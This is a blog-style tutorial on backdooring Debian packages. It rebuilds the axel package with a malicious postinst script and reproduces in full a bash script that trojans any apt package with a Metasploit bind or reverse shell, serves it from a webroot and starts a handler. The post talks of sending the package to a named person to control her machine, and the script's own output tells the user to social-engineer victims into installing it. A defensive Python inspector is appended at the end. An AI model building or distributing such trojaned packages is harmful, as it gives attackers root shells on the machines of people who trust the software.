DEB packages: building a Linux backdoor
Posted 2012-10-2 15:49:15
About deb

DEB is the file extension of the Debian package format. Like the name Debian itself, it comes from Debra Murdock, the wife of Debian founder Ian Murdock. A Debian package is a standard Unix ar archive: it bundles the package metadata (the control archive, which also holds the maintainer scripts) and the package contents (the data archive), each packed with tar and compressed with gzip.
The classic program for handling these packages is dpkg, which is usually driven through Debian's apt-get.

Let's start by installing a package, axel:

  root@Dis9Team:~# apt-get install axel
  Reading package lists... Done
  Building dependency tree      
  Reading state information... Done
  The following NEW packages will be installed:
    axel
  0 upgraded, 1 newly installed, 0 to remove and 305 not upgraded.
  Need to get 51.5 kB of archives.
  After this operation, 221 kB of additional disk space will be used.
  Get:1 http://mirrors.163.com/ubuntu/ natty/universe axel i386 2.4-1 [51.5 kB]
  Fetched 51.5 kB in 3s (14.5 kB/s)
  Selecting previously deselected package axel.
  (Reading database ... 161355 files and directories currently installed.)
  Unpacking axel (from .../archives/axel_2.4-1_i386.deb) ...
  Processing triggers for man-db ...
  Setting up axel (2.4-1) ...
  root@Dis9Team:~#
apt-get looked the package up in the repository listed in your sources, fetched it over HTTP, installed it, and kept a copy of the .deb in the local package cache:

  root@Dis9Team:~# ls /var/cache/apt/archives/axel*
  /var/cache/apt/archives/axel_2.4-1_i386.deb
  root@Dis9Team:~#
Adding the backdoor. We can bind a backdoor into this package and forge its metadata at the same time. First unpack the package contents with dpkg -x, then add a DEBIAN directory with a control file of our own:

  root@Dis9Team:/tmp# dpkg -x /var/cache/apt/archives/axel_2.4-1_i386.deb /tmp/axel
  root@Dis9Team:/tmp# cd axel/
  root@Dis9Team:/tmp/axel# ls
  etc  usr
  root@Dis9Team:/tmp/axel#
  root@Dis9Team:/tmp/axel# mkdir DEBIAN
  root@Dis9Team:/tmp/axel# cd DEBIAN/
  root@Dis9Team:/tmp/axel/DEBIAN# vi control
  root@Dis9Team:/tmp/axel/DEBIAN# cat control
  Package: axel
  Version: 0.1
  Section: Games and Amusement
  Priority: optional
  Architecture: i386
  Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
  Description: Download tools
  root@Dis9Team:/tmp/axel/DEBIAN#

Now write our backdoor. The postinst maintainer script is executed by dpkg, as root, right after the package files have been unpacked:

  root@Dis9Team:/tmp/axel/DEBIAN# cat postinst
  #!/bin/sh
  sudo cat /etc/passwd > /tmp/1
  root@Dis9Team:/tmp/axel/DEBIAN#

Build the DEB package. The maintainer script must be executable, otherwise dpkg-deb --build rejects it:

  root@Dis9Team:/tmp/axel/DEBIAN# chmod 775 postinst
  root@Dis9Team:/tmp/axel/DEBIAN# dpkg-deb --build /tmp/axel
  dpkg-deb: building package `axel' in `/tmp/axel.deb'.
  root@Dis9Team:/tmp/axel/DEBIAN# file axel.deb
  axel.deb: Debian binary package (format 2.0)

Then send it to Helen; once Helen installs it I can control her machine.
Let's try running it ourselves:

  root@Dis9Team:/tmp/axel/DEBIAN# dpkg -i /tmp/axel.deb
  (Reading database ... 161419 files and directories currently installed.)
  Preparing to replace axel 0.1 (using /tmp/axel.deb) ...
  Unpacking replacement axel ...
  Setting up axel (0.1) ...
  sudo: unable to resolve host Dis9Team
  Processing triggers for man-db ...

It ran. The command we embedded was sudo cat /etc/passwd > /tmp/1, so look at that file:

  root@Dis9Team:/tmp/axel/DEBIAN# cat /tmp/1
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  bin:x:2:2:bin:/bin:/bin/sh
  sys:x:3:3:sys:/dev:/bin/sh
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/bin/sh
  man:x:6:12:man:/var/cache/man:/bin/sh
  lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  mail:x:8:8:mail:/var/mail:/bin/sh
  news:x:9:9:news:/var/spool/news:/bin/sh
  uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  proxy:x:13:13:proxy:/bin:/bin/sh
  www-data:x:33:33:www-data:/var/www:/bin/sh
  backup:x:34:34:backup:/var/backups:/bin/sh
  list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  syslog:x:101:103::/home/syslog:/bin/false
  messagebus:x:102:105::/var/run/dbus:/bin/false
  avahi-autoipd:x:103:108:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
  avahi:x:104:109:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
  usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false
  gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
  speech-dispatcher:x:107:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
  kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
  pulse:x:109:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
  rtkit:x:110:119:RealtimeKit,,,:/proc:/bin/false
  hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
  saned:x:112:121::/home/saned:/bin/false
  brk:x:1000:1000:Dis9Team,,,:/home/brk:/bin/bash
  postgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
  smmta:x:114:124:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
  smmsp:x:115:125:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
  vboxadd:x:999:1::/var/run/vboxadd:/bin/false
  root@Dis9Team:/tmp/axel/DEBIAN#
So the command ran automatically during installation. Can this kind of backdoor carry a trojan as well? It can. Here is an automated script (by Aaron Hine, as credited in its header) that builds one:
  #!/bin/bash

  # bash script to generate a Debian (.deb) package trojan using Metasploit payload
  # Author:  Aaron Hine - @redmeat_uk
  # Date: 31-01-2010

  # Disclaimer: this script should be used for educational purposes.  You should obtain permission before running this against an individual or company.
  # The author is not liable for any illegal use of this script.

  scriptname=$(basename "$0")

  if [[ $UID -ne 0 ]]; then
      echo "${scriptname} must be run as root"
      exit 1
  fi

  echo
  echo "#####################################################################"
  echo "Script to generate a Debian package trojan using a Metasploit payload"
  echo "#####################################################################"
  echo

  # change these vars to suit your needs
  msfdir="/opt/metasploit3/msf3"
  tmpdir="/tmp/evildeb"
  workdir="$tmpdir/work"

  # prompt for package name and setup dirs
  echo "Please enter the name of the APT package you wish to trojan:"
  echo "Use apt-cache search <package> for ideas :)"
  echo
  read -r package
  apt-get --download-only install "$package"
  echo
  # -p: do not fail when a previous run left the directories behind
  mkdir -p "$tmpdir" "$workdir" "$workdir/DEBIAN"
  mv /var/cache/apt/archives/"$package"_*.deb "$tmpdir"
  dpkg -x "$tmpdir/$package"_*.deb "$workdir"
  # apt-cache show prints index-only fields (Filename, Size, MD5sum, SHA*) and, for a
  # package that is already installed, a Status: line; dpkg-deb --build rejects Status
  # ("value for `status' field not allowed in this context"), so strip them all before
  # using the output as DEBIAN/control, and keep only the first stanza (q on the first blank line)
  apt-cache show "$package" \
      | sed -e '/^Original-Maintainer/d' -e '/^Status/d' -e '/^Filename/d' -e '/^Size/d' \
            -e '/^MD5sum/d' -e '/^SHA/d' -e '/^Description-md5/d' -e '/^$/q' \
      > "$workdir/DEBIAN/control"
  echo
  echo "Please choose your Metasploit payload"
  echo "-------------------------------------"
  echo
  echo "1. bind tcp"
  echo "2. reverse tcp"
  echo
  echo "press number and hit return:"
  read -r choice

  if [ "$choice" -eq 1 ]; then
      payload="linux/x86/shell/bind_tcp"
      echo "Enter IP:"
      read -r rhostIP
      echo "Enter port:"
      read -r bindport
      options="RHOST=$rhostIP LPORT=$bindport"
  elif [ "$choice" -eq 2 ]; then
      payload="linux/x86/shell/reverse_tcp"
      echo "Enter IP:"
      read -r lhostIP
      echo "Enter port:"
      read -r revport
      options="LHOST=$lhostIP LPORT=$revport"
  else
      echo "unknown choice: $choice"
      exit 1
  fi

  echo
  echo "Please enter the filename for the Metasploit payload:"
  read -r filename
  echo
  # an empty name would make the payload overwrite the package's real binary
  if [ -z "$filename" ]; then
      echo "payload filename must not be empty"
      exit 1
  fi

  cd "$workdir" || exit 1
  # path of the package's main executable inside the unpacked tree, e.g. /usr/bin/axel;
  # the payload is dropped beside it as <binary><filename>, so axel + axel = /usr/bin/axelaxel
  binary=$(find . -executable -type f | grep "$package" | head -n 1 | sed -e 's/^.//')
  trojan="$filename"

  echo "Making post-install script..."
  echo

  # dpkg runs postinst as root after unpacking: start the payload, then the real program
  echo "#!/bin/sh" > "$workdir/DEBIAN/postinst"
  echo "" >> "$workdir/DEBIAN/postinst"
  echo "" >> "$workdir/DEBIAN/postinst"
  echo "sudo chmod 2755 $binary$trojan && $binary$trojan & $binary &" >> "$workdir/DEBIAN/postinst"

  trojan2=$(echo "$binary$trojan" | sed -e 's/^\///')

  echo "Thanks - generating your payload..."
  # msfpayload (Metasploit 3/4 era): X writes the payload as an ELF executable
  "$msfdir/msfpayload" "$payload" $options X > "$workdir/$trojan2"
  echo

  cd "$workdir/DEBIAN" || exit 1
  chmod 755 postinst
  # stop here if the package does not build, instead of reporting success on a missing file
  dpkg-deb --build "$workdir" || { echo "dpkg-deb failed, see the error above"; exit 1; }
  cd "$tmpdir" || exit 1

  echo
  echo "Please enter your webroot directory:"
  read -r webroot
  mv "$tmpdir/work.deb" "$webroot/$package.deb"
  rm -rf "$tmpdir"

  echo
  echo "Trojan'd $package.deb created and placed in $webroot"
  echo

  webserver="python -m SimpleHTTPServer 80"

  echo "Would you like a Python webserver ? (y/n) :"
  read -r svr
  echo

  if [[ "$svr" == "y" || "$svr" == "Y" ]]; then
      cd "$webroot" || exit 1
      $webserver &
      echo
  else
      echo "Fair nuff, setup your own webserver :)"
      echo
  fi

  sleep 1

  echo "Would you like me to setup a metasploit handler ? (y/n) :"
  echo
  read -r handler
  echo
  echo "In the meantime, social engineer your victim in to browsing to your package"
  echo "and get them to install it and wait for your root shell >)"
  echo

  if [[ "$handler" == "y" || "$handler" == "Y" ]]; then
      echo
      "$msfdir/msfcli" exploit/multi/handler payload="$payload" $options E
  else
      echo "Fair nuff, setup your own handler :)"
      echo
  fi

Save it and run it:
  root@Dis9Team:/tmp# ./deb_door.sh

  #####################################################################
  Script to generate a Debian package trojan using a Metasploit payload
  #####################################################################

  Please enter the name of the APT package you wish to trojan:
  Use apt-cache search <package> for ideas :)

  axel
  Reading package lists... Done
  Building dependency tree      
  Reading state information... Done
  The following packages will be upgraded:
    axel
  1 upgraded, 0 newly installed, 0 to remove and 305 not upgraded.
  Need to get 51.5 kB of archives.
  After this operation, 221 kB of additional disk space will be used.
  Get:1 http://mirrors.163.com/ubuntu/ natty/universe axel i386 2.4-1 [51.5 kB]
  Fetched 51.5 kB in 3s (15.2 kB/s)
  Download complete and in download only mode

  mkdir: cannot create directory `/tmp/evildeb': File exists
  mkdir: cannot create directory `/tmp/evildeb/work': File exists
  mkdir: cannot create directory `/tmp/evildeb/work/DEBIAN': File exists

  Please choose your Metasploit payload
  -------------------------------------

  1. bind tcp
  2. reverse tcp

  press number and hit return:
  1
  Enter IP:
  5.5.5.2
  Enter port:
  4444

  Please enter the filename for the Metasploit payload:


  Making post-install script...

  Thanks - generating your payload...

  Created by msfpayload (http://www.metasploit.com).
  Payload: linux/x86/shell/bind_tcp
  Length: 63
  Options: {"RHOST"=>"5.5.5.2", "LPORT"=>"4444"}

  dpkg-deb: error: parsing file '/tmp/evildeb/work/DEBIAN/control' near line 22 package 'axel':
  value for `status' field not allowed in this context

  Please enter your webroot directory:
  mv: cannot stat `/tmp/evildeb/work.deb': No such file or directory

  Trojan'd axel.deb created and placed in

  Would you like a Python webserver ? (y/n) :
  n

  Fair nuff, setup your own webserver :)

  Would you like me to setup a metasploit handler ? (y/n) :

  n

Note that this run did not actually produce /tmp/evildeb/work.deb: apt-cache show adds a Status: line for a package that is already installed, dpkg-deb refused the control file because of it (the error above), and the mv then failed. What is left in /tmp/evildeb is the downloaded package and the unpacked work tree:
  root@Dis9Team:/tmp# cd evildeb/
  root@Dis9Team:/tmp/evildeb# tree
  .
  ├── axel_2.4-1_i386.deb
  └── work
      ├── DEBIAN
      │   └── control
      ├── etc
      │   └── axelrc
      └── usr
          ├── bin
          │   └── axel
          └── share
              ├── doc
              │   └── axel
              │       ├── API.gz
              │       ├── changelog.Debian.gz
              │       ├── changelog.gz
              │       ├── copyright
              │       ├── CREDITS
              │       ├── examples
              │       │   └── axelrc.example
              │       ├── README
              │       └── README.source
              ├── locale
              │   ├── de
              │   │   └── LC_MESSAGES
              │   │       └── axel.mo
              │   ├── nl
              │   │   └── LC_MESSAGES
              │   │       └── axel.mo
              │   ├── ru
              │   │   └── LC_MESSAGES
              │   │       └── axel.mo
              │   └── zh_CN
              │       └── LC_MESSAGES
              │           └── axel.mo
              └── man
                  ├── man1
                  │   └── axel.1.gz
                  └── zh_CN
                      └── man1
                          └── axel.1.gz

  22 directories, 18 files
  root@Dis9Team:/tmp/evildeb#

Look at its control file:
  root@Dis9Team:/tmp/evildeb# cat work/DEBIAN/control
  Package: axel
  Priority: optional
  Section: universe/web
  Installed-Size: 216
  Maintainer: Ubuntu MOTU Developers <ubuntu-motu@lists.ubuntu.com>
  Architecture: i386
  Version: 2.4-1
  Depends: libc6 (>= 2.4)
  Filename: pool/universe/a/axel/axel_2.4-1_i386.deb
  Size: 51456
  MD5sum: e5a4e5a1741cd21919a46766e24e449b
  Description: light download accelerator - console version
  Axel tries to accelerate the downloading process by using multiple connections
  for one file.  It can also use multiple mirrors for one download.  Axel tries
  to be as light as possible (25-30k in binary form), so it might be useful as a
  wget clone on byte-critical systems.
  Homepage: http://axel.alioth.debian.org/
  Bugs: https://bugs.launchpad.net/ubuntu/+filebug
  Origin: Ubuntu

  root@Dis9Team:/tmp/evildeb#

The disguise looks good. Install it:
  root@Dis9Team:/tmp/evildeb# dpkg -i axel_2.4-1_i386.deb
  Selecting previously deselected package axel.
  (Reading database ... 161401 files and directories currently installed.)
  Unpacking axel (from axel_2.4-1_i386.deb) ...
  Setting up axel (2.4-1) ...
  Processing triggers for man-db ...
  root@Dis9Team:/tmp/evildeb#

Check the local listening ports. The process name axelaxel comes from the script's naming scheme: the payload file name is appended to the path of the package's real binary, so a payload named axel ends up as /usr/bin/axelaxel:
  root@Dis9Team:/var/www# netstat -antp | grep 4444
  tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      2975/axelaxel   
  root@Dis9Team:/var/www#
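As an added example (not part of the original post, and not code by the script's author), here is a small Python inspector that does what a defender should do before running dpkg -i on a package that did not arrive through a signed repository: it parses the .deb container described at the top of the post (an ar archive holding debian-binary, control.tar.* and data.tar.*), pulls out the control file and any maintainer scripts, and flags the patterns both postinst variants above rely on (sudo, writes under /tmp, network tools). The two packages it inspects are constructed in memory to mirror the axel example; the control fields and the postinst body are copied from the post, the ELF bytes are a placeholder, and the function names (build_deb, ar_members, inspect_deb, is_suspicious) and the needle list are my own assumptions, not a complete rule set.

```python
"""Added example: parse a .deb (an ar archive holding debian-binary, control.tar.* and
data.tar.*) and list the maintainer scripts dpkg would run as root on install."""
import hashlib
import io
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
# Assumed heuristics, not a complete rule set: things a stock postinst rarely needs.
SUSPICIOUS_NEEDLES = ("sudo ", "/tmp/", "curl ", "wget ", "nc ", "bash -i", "/dev/tcp")

def _ar_member(name: bytes, data: bytes) -> bytes:
    """One ar member: 60-byte header (name, mtime, uid, gid, mode, size, magic), data, even pad."""
    header = (name.ljust(16) + b"0".ljust(12) + b"0".ljust(6) + b"0".ljust(6)
              + b"100644".ljust(8) + str(len(data)).encode().ljust(10) + b"`\n")
    return header + data + (b"\n" if len(data) % 2 else b"")

def _targz(files: dict) -> bytes:
    """gzip'd tar with ./name entries, the layout dpkg-deb itself produces."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, (content, mode) in files.items():
            info = tarfile.TarInfo("./" + name)
            info.size, info.mode = len(content), mode
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()

def build_deb(control: bytes, scripts: dict, data_files: dict) -> bytes:
    """Assemble a .deb in memory; used here only to construct sample input."""
    ctrl = {"control": (control, 0o644)}
    ctrl.update({n: (b, 0o755) for n, b in scripts.items()})
    return (AR_MAGIC + _ar_member(b"debian-binary", b"2.0\n")
            + _ar_member(b"control.tar.gz", _targz(ctrl))
            + _ar_member(b"data.tar.gz", _targz({n: (b, 0o755) for n, b in data_files.items()})))

def ar_members(blob: bytes) -> dict:
    """Walk the ar container and return {member name: bytes}."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    members, pos = {}, len(AR_MAGIC)
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt member header at offset %d" % pos)
        name = hdr[0:16].decode("ascii").rstrip().rstrip("/")  # GNU ar appends '/'
        size = int(hdr[48:58])
        data = blob[pos + 60:pos + 60 + size]
        if len(data) != size:
            raise ValueError("truncated member %r" % name)
        members[name] = data
        pos += 60 + size + (size % 2)  # members start on even offsets
    return members

def inspect_deb(blob: bytes) -> dict:
    """Return the control fields, the maintainer scripts and a hash of the data archive."""
    members = ar_members(blob)
    if members.get("debian-binary", b"").strip() != b"2.0":
        raise ValueError("unsupported .deb format version")
    ctrl = next(n for n in members if n.startswith("control.tar"))
    data = next(n for n in members if n.startswith("data.tar"))
    report = {"fields": {}, "scripts": {}, "data_sha256": hashlib.sha256(members[data]).hexdigest()}
    with tarfile.open(fileobj=io.BytesIO(members[ctrl]), mode="r:*") as tar:
        for entry in tar:
            if not entry.isfile():
                continue
            base, body = entry.name.split("/")[-1], tar.extractfile(entry).read()
            if base == "control":
                for line in body.decode().splitlines():
                    if line[:1] not in (" ", "\t") and ":" in line:  # skip continuation lines
                        key, _, val = line.partition(":")
                        report["fields"][key] = val.strip()
            elif base in MAINTAINER_SCRIPTS:
                report["scripts"][base] = body.decode(errors="replace")
    return report

def is_suspicious(report: dict) -> list:
    """Flag maintainer scripts that do what the post's backdoors do."""
    return ["%s contains %r" % (name, n.strip())
            for name, body in report["scripts"].items() for n in SUSPICIOUS_NEEDLES if n in body]

# Constructed samples: control fields and postinst copied from the post, ELF bytes a placeholder.
CONTROL = (b"Package: axel\nVersion: 2.4-1\nArchitecture: i386\n"
           b"Maintainer: Ubuntu MOTU Developers <ubuntu-motu@lists.ubuntu.com>\n"
           b"Description: light download accelerator - console version\n")
FAKE_ELF = b"\x7fELF" + b"\0" * 60
CLEAN = build_deb(CONTROL, {}, {"usr/bin/axel": FAKE_ELF})
TROJANED = build_deb(CONTROL, {"postinst": b"#!/bin/sh\nsudo cat /etc/passwd > /tmp/1\n"},
                     {"usr/bin/axel": FAKE_ELF})

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("trojaned", TROJANED)):
        print(label, sorted(inspect_deb(blob)["scripts"]), is_suspicious(inspect_deb(blob)))
```

Run as a script, the constructed clean package reports no findings and the trojaned one lists the postinst hits. The same ar_members and inspect_deb functions work on a real file read with open(path, "rb").read(); the manual equivalent is dpkg-deb -e pkg.deb dir followed by reading dir/postinst. For a package that claims to be the archive's own build, also compare its checksum with the MD5sum/SHA fields that apt-cache show prints for that version, since a rebuilt package with a forged control file will not match them.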